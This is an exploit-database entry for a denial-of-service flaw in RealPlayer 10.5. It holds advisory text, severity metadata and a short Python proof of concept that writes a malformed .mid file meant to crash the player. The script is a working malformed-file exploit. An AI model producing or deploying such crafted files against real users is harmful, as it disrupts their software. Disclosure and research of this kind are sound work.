header-logo
Suggest Exploit
vendor:
RealPlayer
by:
shinnai
7.5
CVSS
HIGH
Denial-of-Service
400
CWE
Product Name: RealPlayer
Affected Version From: 10.5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:realnetworks:realplayer:10.5
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2

RealPlayer Denial-of-Service Vulnerability

RealPlayer is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted files. Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users. Arbitrary code execution might be possible, but this is not confirmed.

Mitigation:

Apply the latest security patches and updates for RealPlayer. Avoid opening files from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22050/info

RealNetwork RealPlayer is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted files.

Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users. Arbitrary code execution might be possible, but this is not confirmed.

Version 10.5 is vulnerable to this issue; other versions may also be affected. 

print "-----------------------------------------------------------------------"
print "# RealPlayer 10.5 .mid file Denial of Service"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print "# Tested on Windows XP Professional SP2 all patched"
print "-----------------------------------------------------------------------"

fileOut = open('PoC.mid','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()